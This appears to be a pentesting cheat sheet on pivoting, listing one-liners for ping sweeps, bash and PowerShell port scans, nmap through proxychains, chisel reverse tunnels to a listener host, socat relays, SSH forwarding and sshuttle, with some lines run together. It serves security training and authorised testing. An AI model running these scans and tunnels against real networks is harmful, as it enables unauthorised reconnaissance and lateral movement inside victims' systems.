Pivoting
Binaries
You can download some useful binaries such as chisel, socat, nmap, etc: https://github.com/jpillora/chisel https://github.com/3ndG4me/socat https://github.com/andrew-d/static-binaries
Host discovery
for ip in <network_prefix>.{1..254}; do ((ping -c1 -W1 $ip &>/dev/null && echo $ip)&) done; wait$t = 1..254 | % { [Net.NetworkInformation.Ping]::new().SendPingAsync("<network_prefix>.$_", 100) }; [Threading.Tasks.Task]::WaitAll($t); $t.Result.Where{$_.Status -eq "Success"}.Address.IPAddressToString./nmap -sn <subnet>arp -aPort discovery
for port in {1..65535}; do ((bash -c "echo > /dev/tcp/<target_ip>/$port" 2>/dev/null && echo $port)&); (( port % 200 == 0 )) && wait; done; waitWith progress:
for port in {1..65535}; do ((bash -c "echo > /dev/tcp/<target_ip>/$port" 2>/dev/null && echo -e "$port\033[K")&); (( port % 200 == 0 )) && wait && echo -ne "$port/65535\r"; done; wait
$ip = "<target_ip>"; $pool = [RunspaceFactory]::CreateRunspacePool(1, 100); $pool.Open(); $rs = for ($p = 1; $p -le 1024; $p++) { $ps = [PowerShell]::Create(); $ps.RunspacePool = $pool; [void]$ps.AddScript({ param($ip, $p)try { $tcp = New-Object Net.Sockets.TcpClient; $r = $tcp.BeginConnect($ip, $p, $null, $null); if ($r.AsyncWaitHandle.WaitOne(300, $false) -and $tcp.Connected) { $tcp.EndConnect($r); $p } }finally { $tcp.Close() } }).AddArgument($ip).AddArgument($p); [PSCustomObject]@{P = $ps; S = $ps.BeginInvoke() } }; $rs | % { $r = $_.P.EndInvoke($_.S); if ($r) { $r }; $_.P.Dispose() }; $pool.Dispose()./nmap -p- -sS -n -Pn --min-rate 10000 -v <target_ip>Proxychains -> Nmap
for port in {1..65535}; do ((proxychains -q nmap -p$port -sT -n -Pn --open -v <target_ip> |& grep -Po '\d+(?=/tcp open)')&); (( port % 200 == 0 )) && wait; done; waitProxychains -> Bash
for port in {1..65535}; do ((proxychains -q bash -c "echo > /dev/tcp/<target_ip>/$port" 2>/dev/null && echo $port)&); (( port % 100 == 0 )) && wait; done; waitPort forwarding
First, run the chisel server in reverse mode in your host:
chisel server -p <listener_port> --reverseThen, connect to the server:
chisel client <listener_ip>:<listener_port> R:<local_port>:<remote_host>:<remote_port>chisel client <listener_ip>:<listener_port> R:sockssocat tcp-l:<local_port>,fork,reuseaddr tcp:<remote_host>:<remote_port>ssh <user>@<target_ip> -L <local_port>:<remote_host>:<remote_port>ssh <user>@<target_ip> -D <socks_port>Subnet forwarding
sshuttle -r <user>:<password>@<target_ip> <subnet>